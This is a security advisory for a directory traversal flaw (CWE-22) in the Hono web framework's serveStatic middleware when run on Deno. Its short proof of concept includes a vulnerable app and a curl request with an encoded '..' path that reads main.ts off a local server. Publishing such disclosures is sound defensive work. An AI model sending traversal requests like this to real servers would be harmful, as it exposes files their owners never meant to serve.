GHSA-3mpf-rcc7-5347
Suggest an improvement- Source
- https://github.com/advisories/GHSA-3mpf-rcc7-5347
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-3mpf-rcc7-5347/GHSA-3mpf-rcc7-5347.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-3mpf-rcc7-5347
- Aliases
- Related
- Published
- 2024-04-23T16:20:49Z
- Modified
- 2024-04-24T14:26:48Z
- Severity
-
- 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVSS Calculator
- Summary
- Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
- Details
-
Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial https://hono.dev/getting-started/deno
PoC
$ tree . ├── deno.json ├── deno.lock ├── main.ts ├── README.md └── static └── a.txtsource
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts' import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts' const app = new Hono() app.use('/static/*', serveStatic({ root: './' })) Deno.serve(app.fetch)request
curl localhost:8000/static/%2e%2e/main.tsresponse is content of main.ts
Impact
Unexpected files are retrieved.
- Database specific
{ "nvd_published_at": "2024-04-23T21:15:48Z", "cwe_ids": [ "CWE-22" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-04-23T16:20:49Z" }- References
Affected packages
npm / hono
Package
- Name
- hono
- View open source insights on deps.dev
- Purl
- pkg:npm/hono